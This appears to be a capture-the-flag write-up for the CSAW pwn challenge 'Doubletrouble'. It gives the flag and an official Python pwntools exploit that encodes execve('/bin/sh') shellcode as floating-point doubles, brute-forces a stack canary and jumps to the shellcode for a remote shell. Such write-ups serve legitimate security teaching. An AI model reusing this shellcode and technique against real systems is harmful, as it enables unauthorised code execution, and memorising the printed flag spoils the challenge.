跳转至

Doubletrouble

Shellcoding with doubles

Flag

{4_d0ub1e_d0ub1e_3ntr3ndr3} make it 1337ish

Description

i didn't have a flag in mind, and didn't really have a description, although I could come up with one. Do you have any theme you are trying to stick with? credit: just say nsnc anywhere Hidden in a comment in the source code, I don't care. Feel free to take liberties with the challenge description, but at least use one pun.

solution

officail exp:

#!/usr/bin/env python2
from pwn import *
import binascii
import codecs

"""
NOTE: Must be ran multiple times to brute force stack canary.
"""


def hextodouble(hexstring):
    print(len(hexstring))
    return str("%.16E" % struct.unpack("!d", codecs.decode(hexstring, "hex"))[0])


# context.log_level = 'debug'
context.terminal = ["tmux", "splitw", "-h"]

# p = process("./doubletrouble")
p = remote("pwn.chal.csaw.io", 9002)

stack_address = p.readline()[2:-1].strip()

# shellcode
shellcode1 = "fcfc56f631580b6a"
shellcode2 = "f9f9f968732f2f68"
shellcode3 = "f8e3896e69622f68"
shellcode4 = "f7fa80cdca89c931"
shellcodesortedbelowthis = "f7f94e24f7f94e24"

p.sendline("64")
for i in range(4):
    p.sendline(hextodouble(shellcodesortedbelowthis))
p.sendline("-11")
for i in range(57 - 4):  # subtract 4 for shellcode
    p.sendline(hextodouble(shellcodesortedbelowthis))

p.sendline(hextodouble(shellcode1))
p.sendline(hextodouble(shellcode2))
p.sendline(hextodouble(shellcode3))
p.sendline(hextodouble(shellcode4))

jmpebp = "080497b800000000"  # 4.86192279173924203790903928618E-270
shellcode_location = (
    "080497b8" + stack_address
)  # that first part is pading to be sorted in the right spot
print("shellcode_location: ")
print(shellcode_location)
print(hextodouble(shellcode_location))

p.sendline(hextodouble(shellcode_location))
p.sendline(hextodouble(jmpebp))

p.sendline("ls")
# p.recvuntil("flag")
p.interactive()

评论